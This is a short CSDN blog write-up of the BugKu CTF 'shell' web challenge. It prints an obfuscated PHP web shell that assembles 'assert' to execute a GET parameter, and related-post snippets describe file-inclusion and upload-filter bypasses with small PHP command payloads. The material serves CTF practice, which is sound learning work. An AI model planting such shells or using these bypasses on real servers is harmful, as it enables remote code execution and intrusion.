CTF-BugKu-web shell

最新推荐文章于 2024-11-08 22:13:17 发布
最新推荐文章于 2024-11-08 22:13:17 发布
阅读量367 收藏 8
点赞数 4
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51145360/article/details/142289448
版权

参考:

BugKu_shell_bugku shell-CSDN博客文章浏览阅读1k次,点赞2次,收藏7次。访问目标地址,可以发现是一个空白页根据描述中说的马,最后是($_GET[‘s’]),所以应该是传入一个s参数发现whoami执行成功了,接下来看下都有什么文件找找flag在哪里查看这个flag什么什么的文件成功得到flag!..._bugku shellhttps://blog.csdn.net/qq_44959263/article/details/119634267

打开场景后,发现啥也没有

 分析题目给的描述:

 

<?php 
$poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>

assert函数

 ($_GET[‘s’]),URL中传入一个s参数

看下有什么文件

 查看flag文件

 

qq_51145360
关注
Bugku web——文件包含2
qq_40481505的博客
10-16 982
打开链接,看到链接形式为file=hello.php,因此首先尝试php文件包含 php://filter/read=convert.base64-encode/resource/hello.php 报错 php://input 报错 file://var/www/hello.php 没有报错,但也没有输出 data: text/plain,<?php echo 123; ?> ...
CTF平台题库writeup(二)--BugKuCTF-WEB(部分)
渗透、攻防、CTF、编程
06-26 4234
web2 flag在源码的注释里 计算器 改一下text文本框的最大输入位数>1即可 web基础$_GET GET方式传参即可 web基础$_POST post方式传参即可 矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 这题要求传参num不能是数字,而且num=1,一开始没有什么思路,认为是弱类型的绕过,传了true进去,发现无效,问
Bugku---web---shell
weixin_47450099的博客
05-27 831
system函数,whoami命令的使用,可以直接查看当前登录系统的用户名等
Bugku WEB 文件包含2
qq_41696858的博客
07-21 271
和包含1的2解法基本上一模一样,多文件后缀加菜刀可解,就记几个新加的点吧 <?php?>被过滤,可以考虑用<?=?>或者 <script language=php></script>代替 菜刀直接连接会被拒绝,需要通过文件包含的路径去间接访问,可能是对upload设置了权限,不允许外部访问,也就是菜刀输路径的时候要形如index.php?file=这样去访问 忘了看源码就提交flag了,有兴趣的看一下upload.php的源码,相信会更清楚一点 参考视频链接:
bugku-web-文件包含2
qq_75121443的博客
04-14 479
啧啧啧,怎么说呢,这题出的挺诡异的,本来是考文件包含,结果不伦不类。这里试探结束,开始配合文件包含漏洞,上传图片。上传一个脚本,将图片后缀改为php。这就很离谱,上传的一句话居然用不了。提示是这个文件,访问这个文件。测试后后台为linux系统。各种绕过手法使用后无法绕过。上传成功,文件包含后发现。看到了第一行有一个注释。
bugku web 文件上传2
m0_58189778的博客
08-19 554
题目:bugku 文件包含2 知识点:文件包含 工具:中国剑蚁 解题: 点开链接: 有点小炫酷的动画,除此之外没有什么信息,看一下源码: 发现注释中隐藏的upload.php,与题目的文件上传吻合了,现在思考怎么使用这个文件名,是直接访问还是如同默认页面一样,在file后传入文件名: 这里我们选择后者,比较幸运,成功了: 查看源码也并无玄机,看来应该到了上传文件的时候了。 文件上传通常需要我们做的是,上传一个恶意php脚本,然后我直接访问或者...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2038
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
BugkuCTF——最新web篇writeup(持续更新)
1匹黑马
11-16 3884
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
Bugku--CTF-- 1、本地管理员 2、网站被黑
记录笔记
07-07 1353
Bugku--CTF--1、本地管理员 2、网站被黑
BugkuCTF-WEB-第43题到第52题
Alita_lxz的博客
11-04 1236
BugkuCTF-WEB-第43题到第52题
bugku web-文件包含2
weixin_46578840的博客
09-06 160
打开网址看到一个CKCTF,就没了。审查源代码发现一个upload.php,且url有明显的用于包含文件的file,包含upload 提示只能上传图片,测试发现双后缀可绕过 包含一下这个文件,用蚁剑链接发现返回为空 菜刀也是一样,哎,换一种思路,这里既然有文件包含 上传 <script language='php'> system('ls') </script> 然后进行包含访问,what?这,人傻了 然后看了评论。。。直接包含flag就行了。。。。。 ...
bugku-文件包含2(文件包含漏洞)
烟敛寒林的博客
11-09 2838
本文介绍三种方法,还会讲到这道题菜刀的连接。 进入题目页面,没有什么特别的,只能右键查看源代码,发现提示需要跳转到 upload.php上传页面 方法一: ①新建一个txt文件写入 <script language=php>system("ls")</script> 后另存为 jpg 格式 ②选择浏览上传文件 ③访问 保存进去的文...
BugkuCTF-WEB-文件包含2
烟雨天青色
08-13 1218
解题链接:http://123.206.31.85:49166 打开题目链接,发现url变成了http://123.206.31.85:49166/index.php?file=hello.php很明显的文件包含字眼file,之后我们来看一下网页源代码 我们可以发现网页源代码里面有一个event,不过没什么用,我们在源代码最上方可以看到一行注释写着upload.php,我们尝试访问一下...
bugku-文件包含2 writeup
Peithon的博客
04-30 4190
文件包含2 flag格式:SKCTF{xxxxxxxxxxxxxxxx} hint:文件包含 1.访问http://118.89.219.210:49166/查看源代码 2.将hello.php改成upload.php,访问 这里对上传的文件的格式和大小做了限制 3.上传一个图片马,burpsuite抓包改后缀为.php上传失败 4.这对文件的后缀也做了限制,%00截断不...
Webserver(3.3)生产者消费者模型
学习历程记录和分享
11-05 348
解决该问题需要用互斥量确保线程同步,用条件变量或者信号量去解决生产者和消费者之间同步的问题,生产者把数据生产满了要通知消费者去消费。会产生数据安全问题,比如生产者还未生产出来,就去消费。
vxe-grid ,增加新行,并且定位到新增的行
花花鱼的专栏
11-05 203
vxe-grid新增空行,并且定位到空行位置。
JavaScript 实现文本转语音功能
最新发布
bjjgff的博客
11-08 255
通过这篇教程,我们使用 HTML、CSS 和 JavaScript 构建了一个简单的文本转语音应用。该项目不仅展示了 Web Speech API 的强大功能,同时也展示了如何将前端技术结合起来实现有趣的功能。希望这篇文章对你有所帮助,如果有任何问题或改进建议,欢迎在评论区留言!相关文章你从未见过的 10 个令人惊叹的 JavaScript 技巧HTML+CSS+JS 实现动态模态超级英雄卡片效果使用 HTML 和 CSS 创建 3D 菜单效果。
vue前端进行AES加密,JAVA对其进行AES解密
Ls66666Ls的博客
11-04 255
【代码】vue前端进行AES加密,JAVA对其进行AES解密。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值